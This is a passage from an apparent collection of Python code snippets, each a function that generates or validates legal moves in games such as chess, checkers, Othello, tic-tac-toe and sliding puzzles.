forward_2 = add_vectors(self.coord, cc.V_DOWN_2)\n attacks = get_crawler_moves(self.coord, cc.B_PAWN_CAPTURE_VECTORS)\n starting_rank = cc.RANK_7\n promo_rank = cc.RANK_1\n promo_pieces = cc.BLACK_PROMO\n enemy_set = cc.WHITE_PIECES\n else:\n raise Exception(\"get_pawn_moves: Invalid Piece Color\")\n\n if validate_move(forward_1) and state.board[forward_1] == cc.NO_PIECE:\n if forward_1[0] == promo_rank:\n for p in promo_pieces:\n pawn_moves.append(cc.Action(self.string, self.coord, forward_1, promo=p))\n else:\n pawn_moves.append(cc.Action(self.string, self.coord, forward_1))\n if self.coord[0] == starting_rank and validate_move(forward_2) and state.board[forward_2] == cc.NO_PIECE:\n pawn_moves.append(cc.Action(self.string, self.coord, forward_2, en_p=forward_1))\n\n for attack in attacks:\n if state.board[attack] in enemy_set:\n if attack[0] == promo_rank:\n for p in promo_pieces:\n pawn_moves.append(cc.Action(self.string, self.coord, attack, capture=True, promo=p))\n else:\n pawn_moves.append(cc.Action(self.string, self.coord, attack, capture=True))\n # Make sure Pawns can attack en_passant squares\n elif attack == state.en_passant:\n pawn_moves.append(cc.Action(self.string, self.coord, attack, capture=True))\n\n return pawn_moves", "def get_moves(character):\n if character == 'player':\n x_coord = get_locations()['player'][0]\n y_coord = get_locations()['player'][1]\n elif character == 'monster':\n x_coord = get_locations()['monster'][0]\n y_coord = get_locations()['monster'][1]\n if x_coord == 1 and y_coord == 1:\n return ['S', 'D']\n elif x_coord == STATUS['grid_size'] and y_coord == STATUS['grid_size']:\n return ['W', 'A']\n elif x_coord == 1 and y_coord == STATUS['grid_size']:\n return ['W', 'D']\n elif x_coord == STATUS['grid_size'] and y_coord == 1:\n return ['S', 'A']\n elif x_coord == 1:\n return ['W', 'D', 'S']\n elif y_coord == 1:\n return ['D', 'S', 'A']\n elif x_coord == STATUS['grid_size']:\n return ['W', 'S', 'A']\n elif y_coord == STATUS['grid_size']:\n return ['W', 'A', 'D']\n else:\n return ['W', 'D', 'S', 'A']", "def possible(state_board,turn):\n\tlegal_moves = [] # list of legal moves as Move objects\n\tfor i in range(1,9):\n\t\tfor j in range(1,9):\n\t\t\tif state_board[i][j] == 0:\n\t\t\t\tif flipper([i,j],turn,state_board) != []:\n\t\t\t\t\t# if there are flipped pieces, it appends this move to\n\t\t\t\t\t# the legal moves and draws it in light greens\n\t\t\t\t\tlegal_moves.append((i,j))\n\t\t\t\t\tdrawPiece((i,j),3)\n\t\t\t\telse:\n\t\t\t\t\t# if it is 0 and is not legal, make sure it is of bgcolor\n\t\t\t\t\tdrawPiece((i,j),0)\n\t\n\treturn legal_moves", "def possibleMoves(self,i,j):\n piece = self.board[i][j].piece\n if(piece.pieceCode == \"None\"):\n return []\n \n if(piece.name == \"pawn\"):\n return self.pawnMoves(piece,self.board)\n elif(piece.name == \"king\"):\n return self.kingSteps(self.board,piece.color)\n else:\n return self.pieceMoves(piece,self.board)", "def get_pawn_moves(self, i, j, moves):\r\n # white pawn\r\n if self.turn_white:\r\n # one&two squares moves\r\n if self.board[i - 1][j] == \"--\":\r\n moves.append(Move((i, j), (i - 1, j), self.board))\r\n if i == 6 and self.board[i - 2][j] == \"--\":\r\n moves.append(Move((i, j), (i - 2, j), self.board))\r\n # capturing\r\n # left\r\n if j >= 1:\r\n if self.board[i - 1][j - 1][0] == \"b\":\r\n moves.append(Move((i, j), (i - 1, j - 1), self.board))\r\n elif (i - 1, j - 1) == self.enpas_pos:\r\n moves.append(Move((i, j), (i - 1, j - 1), self.board, enpassant=True))\r\n\r\n # right\r\n if j <= 6:\r\n 
if self.board[i - 1][j + 1][0] == \"b\":\r\n moves.append(Move((i, j), (i - 1, j + 1), self.board))\r\n elif (i - 1, j + 1) == self.enpas_pos:\r\n moves.append(Move((i, j), (i - 1, j + 1), self.board, enpassant=True))\r\n # black\r\n else:\r\n # one&two squares moves\r\n if self.board[i + 1][j] == \"--\":\r\n moves.append(Move((i, j), (i + 1, j), self.board))\r\n if i == 1 and self.board[i + 2][j] == \"--\":\r\n moves.append(Move((i, j), (i + 2, j), self.board))\r\n # capturing\r\n # left\r\n if j >= 1:\r\n if self.board[i + 1][j - 1][0] == \"w\":\r\n moves.append(Move((i, j), (i + 1, j - 1), self.board))\r\n elif (i + 1, j - 1) == self.enpas_pos:\r\n moves.append(Move((i, j), (i + 1, j - 1), self.board, enpassant=True))\r\n # right\r\n if j <= 6:\r\n if self.board[i + 1][j + 1][0] == \"w\":\r\n moves.append(Move((i, j), (i + 1, j + 1), self.board))\r\n elif (i + 1, j + 1) == self.enpas_pos:\r\n moves.append(Move((i, j), (i + 1, j + 1), self.board, enpassant=True))", "def possible_moves(self): \n return [a + 1 for a, b in enumerate(self.board) if b == 0]", "def get_moves(self):", "def get_possible_moves(board):\n\n possible_moves = []\n\n ret_tuple_left = move_left(board)\n ret_tuple_right = move_right(board)\n ret_tuple_up = move_up(board)\n ret_tuple_down = move_down(board)\n\n if ret_tuple_left[0]:\n possible_moves.append(ret_tuple_left[1])\n if ret_tuple_right[0]:\n possible_moves.append(ret_tuple_right[1])\n if ret_tuple_up[0]:\n possible_moves.append(ret_tuple_up[1])\n if ret_tuple_down[0]:\n possible_moves.append(ret_tuple_down[1])\n\n return possible_moves", "def actions(self, state):\n\n actions = []\n \n # if its player 1's turn\n if state.maxs_turn==True:\n # look through all the squares on the board\n for coords in state.gameState:\n # if its a rebel append allowable move and attack actions\n if state.gameState[coords]=='R':\n if state.gameState[(coords[0]-1, coords[1])]== ' ':\n actions.append(\"Move: Rebel @ {} --> {}\".format(coords, (coords[0]-1, coords[1])))\n if ((coords[0]-1, coords[1]+1) in state.gameState) and (state.gameState[(coords[0]-1, coords[1]+1)]== 'S'):\n actions.append(\"Attack: Rebel @ {} --> Sith @ {}\".format(coords, (coords[0]-1, coords[1]+1)))\n if ((coords[0]-1, coords[1]-1) in state.gameState) and (state.gameState[(coords[0]-1, coords[1]-1)]== 'S'):\n actions.append(\"Attack: Rebel @ {} --> Sith @ {}\".format(coords, (coords[0]-1, coords[1]-1)))\n \n # if its a jedi append allowable move and attack actions\n elif state.gameState[coords]=='J':\n for direction in [(-1, 0),(-1,1),(0,1),(1,1),(1,0),(1,-1),(0,-1),(-1,-1)]:\n coord = (coords[0]+direction[0], coords[1]+direction[1])\n # walk in each direction until reaching the edge of board, or a player\n while (coord in state.gameState) and (state.gameState[coord] == ' '):\n actions.append(\"Move: Jedi @ {} --> {}\".format(coords, coord))\n coord = (coord[0]+direction[0], coord[1]+direction[1])\n # if we ran into a sith we can attack\n if (coord in state.gameState) and (state.gameState[coord] == 'S'):\n actions.append(\"Attack: Jedi @ {} --> Sith @ {}\".format(coords, coord))\n \n else:\n for coords in state.gameState:\n if state.gameState[coords]=='S':\n for direction in [(-1, 0),(-1,1),(0,1),(1,1),(1,0),(1,-1),(0,-1),(-1,-1)]:\n coord = (coords[0]+direction[0], coords[1]+direction[1])\n if (coord in state.gameState) and (state.gameState[coord] == ' '):\n actions.append(\"Move: Sith @ {} --> {}\".format(coords, coord))\n elif (coord in state.gameState) and (state.gameState[coord] == 'R'):\n 
actions.append(\"Attack: Sith @ {} --> Rebel @ {}\".format(coords, coord))\n elif (coord in state.gameState) and (state.gameState[coord] == 'J'):\n actions.append(\"Attack: Sith @ {} --> Jedi @ {}\".format(coords, coord))\n \n\n\n if len(actions)==0:\n actions.append(\"Pass\")\n \n actions.sort()\n \n return actions", "def get_instructions(self) -> str:\n instructions = \"Players take turns to occupy available positions \" \\\n \"on the \" \\\n \"board. Once half or more of a ley-line has been \" \\\n \"occupied\" \\\n \"one player, that ley-line is entirely captured by \" \\\n \"said player. The winner is the person who captures \" \\\n \"half\" \\\n \"or more of the ley-lines first.\"\n return instructions", "def possible_moves(self, piece):\n def _index(orig, off):\n \"\"\"Helper function to find the new index.\"\"\"\n orig_x, orig_y = orig\n off_x, off_y = off\n return (orig_y - off_y) * self.ncols + (orig_x - off_x)\n\n p_x, p_y = piece\n p_i = _index(piece, (0, 0))\n\n # pass a list of the four corners first for basic possibles\n move_land = [((p_x + i, p_y + j), self.squares[_index(piece, (i, j))])\\\n for i in [-1, 1] for j in [-1, 1]]\n possibles = self.squares[p_i].can_move(piece, move_land)\n\n # next append the new list from jumps\n jump_land = [((p_x + i, p_y + j), self.squares[_index(piece, (i, j))])\\\n for j in [-2, 2] for i in [-2, 2]]\n possibles += self.squares[p_i].can_jump(piece, move_land, jump_land)\n\n # clean out the list of duplicates, although there should be none\n return [m for i, m in enumerate(possibles) if m not in possibles[:i]]", "def get_legal_moves(self):\n # for each square in the castle figure out if an moves can occur from it.\n moves = []\n allowed = [self.turn]\n if self.turn == DEFENDER:\n allowed.extend((KING, CASTLE_OCCUPIED))\n it = np.nditer(self.board_state, flags=['multi_index'])\n while not it.finished:\n index = it.multi_index\n curr_loc = it[0]\n if curr_loc in allowed:\n moves.extend(self.get_legal_move_piece(curr_loc, index))\n it.iternext()\n return moves", "def get_goat_possible_moves(self) -> List:\n moves = []\n for pos in self.get_all_positions():\n if pos.is_goat():\n addr_from = pos.address\n for addr_to in pos.piece.get_valid_moves():\n moves.append((addr_from, addr_to))\n\n return moves", "def __update_valid_moves(self):\r\n\r\n\t\tmoves = ['Stay']\r\n\r\n\t\t# case for 21\r\n\t\tfor value in self.values:\r\n\t\t\tif value > 21:\r\n\t\t\t\tself.valid_moves = 'Bust'\r\n\t\t\t\treturn\r\n\t\t\tif value == 21:\r\n\t\t\t\tif len(self.cards) == 2:\r\n\t\t\t\t\tself.valid_moves = 'Blackjack'\r\n\t\t\t\t\treturn\r\n\t\t\t\tself.valid_moves = '21'\r\n\t\t\t\treturn\r\n\t\tmoves.append('Hit')\r\n\r\n\t\tif len(self.cards) <= 2:\r\n\t\t\tmoves.append('Double')\r\n\r\n\t\tif len(self.cards) == 2:\r\n\t\t\tif self.cards[0].rank == self.cards[1].rank:\r\n\t\t\t\tmoves.append('Split')\r\n\r\n\t\tself.valid_moves = moves", "def get_valid_moves(self):\n if self.king:\n valid_moves = [[self.row + 1, self.col + 1],\n [self.row + 1, self.col - 1],\n [self.row - 1, self.col - 1],\n [self.row - 1, self.col + 1]]\n else:\n if self.player == 1:\n valid_moves = [[self.row + 1, self.col + 1],\n [self.row + 1, self.col - 1]]\n else:\n valid_moves = [[self.row - 1, self.col - 1],\n [self.row - 1, self.col + 1]]\n return valid_moves", "def legal_moves(board,player=None):\r\n \r\n possible_moves = []\r\n moves = []\r\n if player == None:\r\n moves += board.white + board.black\r\n elif player == -1:\r\n moves += board.black\r\n elif player == 1:\r\n moves += 
board.white\r\n \r\n captured = False\r\n for pos in moves:\r\n if pos[0] == 'A':\r\n m = [-8,-7,1,8,9]\r\n elif pos[0] == 'H':\r\n m = [-9,-8,-1,7,8]\r\n else:\r\n m = [-9,-8,-7,-1,1,7,8,9]\r\n loc = decode(pos)\r\n for i in m:\r\n captured = capture(board, player, possible_moves, pos, loc, i)\r\n canter(board, player, possible_moves, pos, loc, i)\r\n plain(board, player, possible_moves, pos, loc, i)\r\n \r\n if captured:\r\n enemy_list = []\r\n for capturing_move in possible_moves:\r\n if len(capturing_move) == 3:\r\n enemy_list.append(capturing_move)\r\n possible_moves = list(enemy_list)\r\n\r\n return possible_moves", "def safe_moves(p, state):\n\n x, y = state['players'][p]['x'], state['players'][p]['y']\n\n moves = []\n actions = [(1, 0, 'east'),\n (-1, 0, 'west'),\n (0, -1, 'north'),\n (0, 1, 'south')]\n for dx, dy, move in actions:\n tx, ty = str(x + dx), str(y + dy)\n if tx not in state['cells'] or ty not in state['cells'][tx]:\n moves.append(move)\n\n return moves", "def parse_moves(moves):\n possible_moves = []\n for move in moves:\n if move == 'W':\n possible_moves.append('UP')\n elif move == 'D':\n possible_moves.append('RIGHT')\n elif move == 'S':\n possible_moves.append('DOWN')\n elif move == 'A':\n possible_moves.append('LEFT')\n return possible_moves", "def getPossibleMoves(self): # called to get possible positions this piece can go\r\n \r\n moves = {}\r\n\r\n ids = []\r\n\r\n for piece in self.board.pieces.values():\r\n if piece.name == \"empty\":\r\n piece.glow = False\r\n piece.ready = False\r\n\r\n self.piece = self\r\n\r\n def check(direction=\"left\", heading=\"north\", x=None, y=None):\r\n piece = self.piece\r\n if direction == \"left\": x -= 50\r\n else: x += 50\r\n\r\n if heading == \"north\": y -= 50\r\n else: y += 50\r\n\r\n if (x, y) in self.board.pieces: # position is empty\r\n empty = self.board.getPiece((x, y))\r\n empty.glow = True\r\n old, new, obj = (direction, heading), (x, y), piece\r\n identity = self.getRandomID(ids) # get an ID for the move\r\n moves[identity] = old, new, obj\r\n\r\n if piece.isKing: # piece is a king, so go on\r\n check(direction, heading, x, y)\r\n else: # its not empty, so check if its comrade\r\n x1, y1 = x+25, y+25\r\n piece2 = self.board.getPiece((x1, y1))\r\n try:\r\n if piece.isComrade(piece2):# piece is comrade so return\r\n return\r\n else: # piece is not comrade, so check empty\r\n if direction == \"left\": x2 = x1-25-50\r\n else: x2 = x1-25+50\r\n\r\n if heading == \"north\": y2 = y1-25-50\r\n else: y2 = y1-25+50\r\n\r\n if (x2, y2) in self.board.pieces: # its empty, so notify player\r\n empty = self.board.getPiece((x2, y2))\r\n empty.glow = True\r\n empty.ready = True\r\n\r\n old, new, obj = (direction, heading), (x2, y2), piece2\r\n identity = self.getRandomID(ids)\r\n moves[identity] = old, new, obj\r\n\r\n check(direction, heading, piece2.x-25, piece2.y-25)\r\n check(direction, heading, x2, y2)\r\n \r\n # check empty or comrade again\r\n if direction == \"left\": x3 = x2-50\r\n else: x3 = x2+50\r\n\r\n if heading == \"north\": y3 = y2-50\r\n else: y3 = y2+50\r\n\r\n if (x3, y3) in self.board.pieces: # positon(address) is empty\r\n return\r\n else: # there is a piece, so check if comrade, stop, if not comrade continue\r\n x3+=25\r\n y3+= 25\r\n\r\n piece3 = self.board.getPiece((x3, y3))\r\n if piece3.isComrade(piece2): # comrades, so stop\r\n return\r\n else: # not comrades, so continue\r\n self.piece = piece3\r\n check(direction, heading, x, y)\r\n\r\n #self.piece = piece2\r\n \r\n #check(direction, heading, x2, y2) # 
keep searching\r\n else: # its not empty, so return\r\n return\r\n except:\r\n pass\r\n\r\n if self.piece.name == \"white\": direction = \"north\"\r\n else: direction = \"south\"\r\n \r\n check(\"left\", direction, self.piece.x-25, self.piece.y-25)\r\n check(\"right\", direction, self.piece.x-25, self.piece.y-25)\r\n \r\n if self.piece.isKing:\r\n if self.piece.name == \"white\": heading = \"south\"\r\n else: heading = \"north\"\r\n \r\n check(\"left\", heading, self.piece.x-25, self.piece.y-25)\r\n check(\"right\", heading, self.piece.x-25, self.piece.y-25)\r\n\r\n if self.piece.name == \"white\":\r\n eatMoves = self.board.game.thinkEatMoves(moves, \"person\")\r\n if eatMoves is not None:\r\n return eatMoves\r\n\r\n return moves", "def findPlacesToMove():\n movesDestinations = [];\n \n curY = curBlank[0];\n curX = curBlank[1];\n\n if(curY-1 >= 1): #UP\n movesDestinations.append((curY-1, curX));\n if(curY+1 <= n): #DOWN\n movesDestinations.append((curY+1, curX));\n if(curX-1 >= 1): #LEFT\n movesDestinations.append((curY, curX-1));\n if(curX+1 <= n): #RIGHT\n movesDestinations.append((curY, curX+1));\n \n return movesDestinations;", "def show_moves(self):\n return self.game_manager.send_adversary_moves(self)", "def get_valid_moves(self):\r\n # castling and en-passant rights are stored, because move affects these values\r\n temp_enpassant_possible = self.enpas_pos\r\n temp_castle = CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs)\r\n\r\n # for validating a possible move\r\n #1 all possibile moves are generated\r\n #2 each pos moves are made\r\n #3 generate opponent move\r\n #4 check if any of those moves let the king attacked\r\n #5 moves which let the king in chess are eliminated\r\n #6 the moves are undone\r\n moves = self.get_all_possible_moves() # 1\r\n\r\n # castle moves are directly introduced in valid moves\r\n if not self.turn_white:\r\n self.get_castle_moves(self.bKingPos[0], self.bKingPos[1], moves)\r\n else:\r\n self.get_castle_moves(self.wKingPos[0], self.wKingPos[1], moves)\r\n\r\n for i in range(len(moves) - 1, -1, -1): # 2\r\n self.make_move(moves[i])\r\n # 3 #4\r\n self.turn_white = not self.turn_white\r\n if self.in_check():\r\n moves.remove(moves[i]) # 5\r\n self.turn_white = not self.turn_white\r\n self.undo_move()\r\n\r\n # game ending possibilities\r\n if len(moves) == 0:\r\n if self.in_check():\r\n self.checkMate = True\r\n print(\"Checkmate !\")\r\n else:\r\n self.staleMate = True\r\n print(\"Stalemate !\")\r\n else:\r\n self.checkMate = False\r\n self.staleMate = False\r\n\r\n # the rigths are restored, and the values are not affected\r\n self.enpas_pos = temp_enpassant_possible\r\n self.cr_castle_r = temp_castle\r\n\r\n return moves", "def get_all_moves(self):\n # 2d matrix of true/false, true if something can be placed\n legal_move_board = []\n possible_move_list = []\n for row in range(self.size):\n move_row = []\n for col in range(self.size):\n empty = self.board[row][col].state == PegState.EMPTY\n move_row.append(empty)\n if empty:\n possible_move_list.append((row, col))\n legal_move_board.append(move_row)\n \n # every position where something can be placed (list of tuples) (Combined with above)\n \"\"\" possible_move_list = []\n for row in range(self.size):\n for col in range(self.size):\n if legal_move_board[row][col] == True:\n possible_move_list.append((row, col))\n \"\"\"\n return legal_move_board, possible_move_list", "def canter(board,player,possible_moves, pos, loc, i):\r\n \r\n next_piece = 
encode(loc+i) \r\n new_pos = loc + (i*2)\r\n \r\n if player == 1 and next_piece in board.white:\r\n if not((pos[0] == 'B') and ((next_piece)[0] == 'A')) and not((pos[0] == 'G') and ((next_piece)[0] == 'H')):\r\n new_enc = encode(new_pos)\r\n if new_pos in range(0,112) and (new_enc not in board.white) and (new_enc not in board.black) and (new_enc not in board.empty):\r\n possible_moves.append([pos,new_enc])\r\n if player == -1 and next_piece in board.black:\r\n if not((pos[0] == 'B') and ((next_piece)[0] == 'A')) and not((pos[0] == 'G') and ((next_piece)[0] == 'H')):\r\n new_enc = encode(new_pos)\r\n if new_pos in range(0,112) and (new_enc not in board.white) and (new_enc not in board.black) and (new_enc not in board.empty):\r\n possible_moves.append([pos,new_enc])", "def get_available_moves(self, board):\n pass", "def get_all_game_pieces_potential_moves(self):\n\n board = self.get_board()\n\n for row in board:\n\n for column in row:\n\n if column is not None:\n\n print(column.get_label(), ': ' , column.get_potential_moves())", "def random_moves(length):\n ans = \"\"\n for dummy_num in range(length):\n ans += random.choice([\"u\",\"d\",\"l\",\"r\"])\n return ans", "def moves(self, board_state):\n # pos_moves = generate_moves(board_state) # Naive moves function here\n blacks = board_state.search_board('B')\n # Generate the possible moves required to kill the first black piece\n # on the board\n pos_moves = sorted_generate_moves_piece(board_state, blacks[0])\n return pos_moves", "def _get_piece_moves(self, x, y):\n\n piece = self.get_piece(x, y)\n moves = []\n\n if not piece:\n return moves\n\n if piece.name == 'rook' or piece.name == 'queen':\n direcs = ['up', 'down', 'left', 'right']\n moves = [self._get_moves_indirection(x, y, direc) for direc in\n direcs]\n\n elif piece.name == 'bishop' or piece.name == 'queen':\n direcs = ['d1', 'd2', 'd3', 'd4']\n for direc in direcs:\n moves += self._get_moves_indirection(x, y, direc)\n\n elif piece.name == 'king':\n moves = [(x-1, y-1), (x-1, y), (x-1, y+1), (x, y-1),\n (x, y+1), (x+1, y-1), (x+1, y), (x+1, y+1)]\n\n elif piece.name == 'knight':\n moves = [(x-1, y-2), (x-2, y-1), (x-2, y+1), (x-1, y+2),\n (x+1, y+2), (x+2, y+1), (x+1, y-2), (x+2, y-1)]\n\n elif piece.name == 'pawn':\n if piece.color == ChessGame.BLACK:\n moves = [(x-1, y), (x-1, y-1), (x-1, y+1)]\n else:\n moves = [(x+1, y), (x+1, y-1), (x+1, y+1)]\n\n tmp = list(moves)\n for u, v in tmp:\n if v != y and not self.is_enemy(u, v, piece.color):\n moves.remove((u, v))\n\n if v == y and self.is_enemy(u, v, piece.color):\n moves.remove((u, v))\n\n mycolor = piece.color\n valid = set()\n for (u, v) in moves:\n if not self.in_bounds(u, v):\n continue\n\n if not self.get_piece(u, v): # board is blank\n valid.add((u, v))\n\n if self.is_enemy(u, v, mycolor):\n valid.add((u, v))\n\n return valid", "def get_legal_moves(self):\n\n return self._legal_moves", "def get_all_possible_moves(self):\r\n moves = []\r\n for i in range(8):\r\n for j in range(8):\r\n color = self.board[i][j][0]\r\n if (color == 'b' and not self.turn_white) or (color == 'w' and self.turn_white):\r\n p_type = self.board[i][j][1]\r\n if p_type == 'r':\r\n self.get_rook_moves(i, j, moves)\r\n elif p_type == 'k':\r\n self.get_king_moves(i, j, moves)\r\n elif p_type == 'q':\r\n self.get_queen_moves(i, j, moves)\r\n elif p_type == 'p':\r\n self.get_pawn_moves(i, j, moves)\r\n elif p_type == 'b':\r\n self.get_bishop_moves(i, j, moves)\r\n elif p_type == 'n':\r\n self.get_knight_moves(i, j, moves)\r\n return moves", "def 
get_legal_moves(self):\n moves = []\n if self.player_locations[self.whose_turn] is None:\n return self.get_blank_locations()\n matrix = [(1,0), (-1,0), (0,1), (0,-1), (1,1), (1,-1), (-1, 1), (-1,-1)]\n\n for dx, dy in matrix:\n x,y = self.player_locations[self.whose_turn]\n while x+dx <= xdim and x+dx >= 0 and y+dy <= ydim and y+dy >= 0:\n x = x+dx\n y = y+dx\n if self.board[x][y] : break\n moves.append((x,y))\n return moves", "def get_possible_moves(board):\n\tpossible_moves = []\n\n\tfor count, player in enumerate(board):\n\t\tif player is not server_player and player is not user_player:\n\t\t\tpossible_moves.append(count)\n\n\treturn possible_moves", "def legal_moves_in_uci(self):\n\n # get all legal moves. 'legal_moves' is inherited attribute from super class that returns all possible moves\n return [m.uci() for m in list(self.legal_moves)]", "def random_move(board):\n\tpossible_moves = []\n\tboard_copy = list(board)\n\n\tfor count, player in enumerate(board):\n\t\tif player == ' ':\n\t\t\tpossible_moves.append(count)\n\n\tif len(possible_moves) != 0:\n\t\tmove = random.choice(possible_moves)\n\t\tboard_copy[move] = 'o'\n\n\t\treturn ''.join(board_copy)\n\t\n\telse:\n\t\treturn board", "def get_next_moves1(self):\n moves = []\n for i in range(len(self.board)):\n for j in range(len(self.board[i])):\n if self.board[i][j] == \"\":\n next_board = copy.deepcopy(self.board)\n next_board[i][j] = colors[self.turn] + self.turn + \"\\u001b[0m\"\n next_turn = get_opponent(self.turn)\n moves.append(DotsAndBoxesState(next_board, next_turn))\n return moves", "def actions(board):\r\n if terminal(board):\r\n return \"X\"\r\n poss = []\r\n for row in range(len(board)):\r\n for col in range(len(board[row])):\r\n if not board[row][col] == \"X\" and not board[row][col] == \"O\":\r\n poss.append((row, col))\r\n \r\n return list(set(poss))\r\n\r\n raise NotImplementedError", "def get_legal_moves(self, i, j):\r\n legal_moves = list()\r\n for action in self.action_dic.keys():\r\n coordinate_change = self.action_dic[action]\r\n new_i = coordinate_change[0] + i\r\n new_j = coordinate_change[1] + j\r\n if (new_i >= 0 and new_i < 3) and (new_j >= 0 and new_j < 3):\r\n legal_moves.append(self.reflection_dic[action])\r\n return legal_moves", "def possible_moves_list(row, col):\r\n top = (row - 1, col)\r\n bot = (row + 1, col)\r\n left = (row, col - 1)\r\n right = (row, col + 1)\r\n diagonal_top_left = (row - 1, col - 1)\r\n diagonal_top_right = (row - 1, col + 1)\r\n diagonal_bot_left = (row + 1, col - 1)\r\n diagonal_bot_right = (row + 1, col + 1)\r\n moves = [top, bot, left, right, diagonal_top_left, diagonal_top_right, diagonal_bot_left, diagonal_bot_right]\r\n return moves", "def validpositions(tile):\n if tile == 11 or tile == 21:\n valid_pos = \"n\"\n elif tile == 12:\n valid_pos = \"nes\"\n elif tile == 13:\n valid_pos = \"es\"\n elif tile == 22 or tile == 33:\n valid_pos = \"sw\"\n elif tile == 23:\n valid_pos = \"ew\"\n elif tile == 32:\n valid_pos = \"ns\"\n possible_directions(valid_pos)\n return valid_pos", "def get_instructions(self):\n return \"A non-negative whole number is chosen as the starting \\n\" \\\n \"valueby some neutral entity. In our case, a player will \\n\" \\\n \"choose it (i.e. through the use of input. The player whose \\n\" \\\n \"turn it is chooses some square of a positive whole number (\\n\" \\\n \"such as 1, 4, 9, 16, . . . ) to subtract from the \\n\" \\\n \"value, provided the chosen square is not larger. 
After \\n\" \\\n \"subtracting, we have a new value and the next player \\n\" \\\n \"chooses a square to ubtract from it. Play continues\\n\" \\\n \" to alternate between the two players until no moves are\\n\" \\\n \" possible. Whoever is about to play at that point loses!\"", "def get_move(moves):\n pass", "def available_moves(self):\n available_moves = []\n for i in range(self.quadrants_count):\n quadrant_positions = self.play_area[i].available_positions()\n for p in quadrant_positions:\n position = p + i * 9\n for j in range(self.quadrants_count):\n move1 = [str(position), str(j + 1), \"l\"]\n move2 = [str(position), str(j + 1), \"r\"]\n available_moves.append(\" \".join(move1))\n available_moves.append(\" \".join(move2))\n return available_moves", "def get_possible_moves(self):\n moves = []\n for i in range(1, self.current_total + 1):\n if i ** 2 <= self.current_total:\n moves.append(i ** 2)\n\n return moves", "def openMoves(self):\n arr = []\n for y in range(0,HEIGHT):\n for x in range(0,WIDTH):\n t = self.getPawn(x,y)\n if(t!=None):\n for z in range(-1,2):\n if(self.legalMove(t,z)):\n #move , #newState\n arr.append((t,z))\n return arr", "def valid_moves(board):\n return [i for i, x in enumerate(board) if x == ' ']", "def render_possible_moves(self):\n for move in self.env.possible_moves(self.env.turn):\n self.render_marker(move, Colors.BLUE)", "def test_find_knight_next_moves_limit_of_board(self):\n result = _find_knight_next_moves('h1')\n self.assertEqual(['f2', 'g3'], result)", "def possible_directions(valid_positions):\n if valid_positions == \"n\":\n print(\"You can travel: (N)orth.\")\n elif valid_positions == \"nes\":\n print(\"You can travel: (N)orth or (E)ast or (S)outh.\")\n elif valid_positions == \"es\":\n print(\"You can travel: (E)ast or (S)outh.\")\n elif valid_positions == \"sw\":\n print(\"You can travel: (S)outh or (W)est.\")\n elif valid_positions == \"ew\":\n print(\"You can travel: (E)ast or (W)est.\")\n elif valid_positions == \"ns\":\n print(\"You can travel: (N)orth or (S)outh.\")", "def print_game_state(board):\r\n print(board)\r\n illegal_moves = [(0, 0), (2, 0), (0, 4), (2, 4)]\r\n for i in range(board.shape[0]):\r\n buffer = ''\r\n for j in range(board.shape[1]):\r\n if board[i][j] == 1:\r\n buffer += 'X\\t'\r\n elif board[i][j] == 2:\r\n buffer += '0\\t'\r\n elif (i, j) in illegal_moves:\r\n buffer += ' \\t'\r\n else:\r\n buffer += '-\\t'\r\n print (buffer)", "def __str__(self):\n board = \"\"\" 0 1 2 3 4 5\\n\"\"\"\n\n for y in range(Board.board_size):\n board += str(y) + \" \"\n for x in range(Board.board_size):\n piece = self.board[x][y] if self.board[x][y] is not None else \".\"\n\n piece = str(piece).lower() if piece in self.player_1_pieces else str(piece)\n\n board += piece\n board += \" \"\n board += \"\\n\"\n return board", "def _get_possible_moves(board, lightcycle):\n result = []\n for diff in ((0, 1, PlayerActions.MOVE_DOWN), (1, 0, PlayerActions.MOVE_RIGHT), (0, -1, PlayerActions.MOVE_UP), (-1, 0, PlayerActions.MOVE_LEFT)):\n next_x = lightcycle['position'][0] + diff[0]\n next_y = lightcycle['position'][1] + diff[1]\n if 0 <= next_x < len(board) and 0 <= next_y < len(board[0]):\n if board[next_x][next_y] in (EMPTY, POWERUP):\n result += [diff]\n return result", "def legalMoves( self, row, col):\n moves = []\n if(row != 0 and self.board[row - 1][col] == 0):\n moves.append(0)\n if(col != self.n - 1 and self.board[row][col + 1] == 0):\n moves.append(2)\n if(row != self.n - 1 and self.board[row + 1][col] == 0):\n moves.append(4)\n if(col != 0 and 
self.board[row][col - 1] == 0):\n moves.append(6)\n \n if (row + col) % 2 == 0: # can follow the cross\n if (row != 0 and col != 0 and self.board[row - 1][col - 1] == 0):\n moves.append(7)\n if (row != 0 and col != self.n - 1 and self.board[row - 1][col + 1] == 0):\n moves.append(1)\n if (row != self.n - 1 and col != self.n - 1 and self.board[row + 1][col + 1] == 0):\n moves.append(3)\n if (row != self.n - 1 and col != 0 and self.board[row + 1][col - 1] == 0):\n moves.append(5)\n\n return moves", "def print_moves(self):\n print self._current_moves\n self._current_moves = \"\"", "def command_moves(board, locations):\n possible_moves = []\n buffers = [(1,0), (0,1), (-1,0), (0,-1)]\n\n for piece in locations:\n piece_moves = []\n\n for move in buffers:\n\n poss_move = return_valid_move(board, locations, piece, move)\n\n if poss_move:\n piece_moves.append(poss_move)\n\n possible_moves.append(piece_moves)\n\n return possible_moves", "def _annotate_moves(moves, ladders, snakes):\n solution = [{\"src\": moves[i], \"dst\": moves[i + 1]} for i in xrange(len(moves) - 1)]\n\n for move in solution:\n move[\"step\"] = move[\"dst\"] - move[\"src\"]\n if move[\"src\"] in get_src(ladders):\n move[\"action\"] = \"Climbs ladder\"\n elif move[\"src\"] in get_src(snakes):\n move[\"action\"] = \"Is digested by snake\"\n else:\n move[\"action\"] = \"Rolls dice\"\n\n return solution", "def get_legal_moves(self, player: int) -> np.ndarray:\n stage2 = self.is_stage2()\n action_mask = np.zeros((24, 5, 25), dtype=bool)\n # if stage 1 add set options\n array_board = np.array(self.board)\n if not stage2:\n legal_pos = np.where(array_board == 0)[0]\n for pos in legal_pos:\n if self.is_mill(player, pos, self.board): # current selection completes a mill\n opp_pos = np.where(array_board == -player)[0]\n opp_pos = [opp_p for opp_p in opp_pos if\n not self.is_mill(-player, opp_p, self.board)] # can't remove opponent in mill\n if len(opp_pos) == 0: # exception for the case where all opponents pieces are in mills\n opp_pos = np.where(array_board == -player)[0]\n action_mask[pos, -1, opp_pos] = True\n else:\n action_mask[pos, -1, -1] = True # place piece on board\n else:\n from_pos_cands = np.where(array_board == player)[0]\n for from_pos in from_pos_cands:\n mill_cands = 